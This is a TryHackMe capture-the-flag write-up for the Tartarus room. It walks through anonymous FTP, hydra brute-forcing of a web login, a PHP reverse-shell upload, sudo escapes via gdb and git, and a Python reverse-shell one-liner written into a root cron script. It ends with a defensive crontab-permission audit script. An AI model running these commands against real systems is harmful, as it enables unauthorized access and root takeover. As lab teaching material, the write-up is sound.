Tartarus — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Tartarus — TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan for open ports.
Then log in to its FTP server as anonymous and read the file test.txt:
get test.txt -
Specify "-" as the local file name so the contents are printed directly instead of being downloaded to your machine.
Well, nothing interesting. Let’s cd to another folder.
It's a bit nested, so remember to cd to the exact directory. Get the txt file there.
We’ve got another hidden dir. Let’s access it.
It’s a login page. We don’t know the credentials yet.
So let's try to find other hidden dirs using dirbuster.
Let’s read the robots.txt file.
So maybe d4rckh is our username! Let’s try it later. Also we see a directory /admin-dir. Access it.
Get both of these files for bruteforcing using wget.
I named the files userfile and passfile. You can name them whatever you want.
Let’s login using d4rckh and random password.
I got the "Incorrect username" response. Now bruteforce the username using hydra, with a fixed dummy password (-p test) and the failure string as the match condition:
hydra -L userfile -p test <ip> http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect username" -I
*Remember to change userfile and passfile to your files' names.
After a while I got the correct username: enox. Try to login with enox and a random password.
Now let's brute the password, this time with the single known username (-l enox) and the wordlist (-P passfile):
hydra -l enox -P passfile <ip> http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect password!"
Now let’s login.
Let’s upload our php-reverse-shell.
However, I don't know where the file is uploaded to, so I'll use dirbuster again to look for hidden dirs.
So it will be uploaded to /images/uploads.
Start a listener using nc:
nc -lvnp <port>
Access this dir and we will get our shell!
cd to home and get our 1st flag.
Now let's try to get root. First spawn a tty shell using python:
python -c 'import pty; pty.spawn("/bin/bash")'
Now run sudo -l to see which commands we can run via sudo.
So we can run gdb as thirtytwo without a password.
sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit
Now we are thirtytwo.
Run sudo -l again as thirtytwo.
We can run git as d4rckh:
sudo -u d4rckh /usr/bin/git -p help config
Now we are d4rckh. We cannot run sudo -l here as it asks for a password, so let's try another way: modifying the python file cleanup.py in /home/d4rckh.
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<host-ip>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > cleanup.py
You can find your host ip by accessing 10.10.10.10.
This script will spawn a reverse shell to port 1234, so start a listener on our machine:
nc -lvnp 1234
This cleanup.py is executed automatically every 2 minutes as root, as stated in the /etc/crontab file, even though the file itself lives in d4rckh's home and is writable by that user.
So just wait 2 minutes and we will have our shell as root!
Get our root.txt flag.
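The root path above exists only because /etc/crontab runs a script as root that a non-root user can edit. The following added example (mine, not part of the writeup or the box) is the check an administrator could run to catch that: it parses /etc/crontab-format entries and flags any job whose script is owned by, or writable by, someone other than the user the job runs as. It builds a constructed crontab and a world-writable temp script so it runs offline.

```python
import os
import pwd
import stat
import tempfile

def parse_system_crontab(text):
    """Yield (user, command) per job line (minute hour dom month dow user command)."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or "=" in fields[0]:
            continue  # VAR=value lines and malformed entries
        yield fields[5], fields[6]

def script_paths(command):
    """Absolute paths in the command that exist as regular files."""
    return [t for t in command.replace("&&", " ").split()
            if t.startswith("/") and os.path.isfile(t)]

def weak_permissions(path, cron_user):
    """Reasons someone other than cron_user could change what this job runs."""
    st, reasons = os.stat(path), []
    if st.st_uid != pwd.getpwnam(cron_user).pw_uid:
        reasons.append("owned by uid %d, not %s" % (st.st_uid, cron_user))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group/world-writable")
    return reasons

def audit_crontab(text):
    """Return [(user, path, reasons)] for every job with a modifiable script."""
    findings = []
    for user, command in parse_system_crontab(text):
        for path in script_paths(command):
            reasons = weak_permissions(path, user)
            if reasons:
                findings.append((user, path, reasons))
    return findings

def demo():
    # Constructed scenario: a root job pointing at a script in a user's home.
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "cleanup.py")
    with open(script, "w") as f:
        f.write("print('cleanup')\n")
    os.chmod(script, 0o666)  # world-writable: the weakness the box turns on
    crontab = ("SHELL=/bin/sh\n"
               "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
               "*/2 * * * * root python3 %s\n" % script)
    return audit_crontab(crontab)
```

Run it against the real file with audit_crontab(open("/etc/crontab").read()); the fix on a box like this is to have the script owned by root with mode 0755 (or 0700) and not live under a user's home.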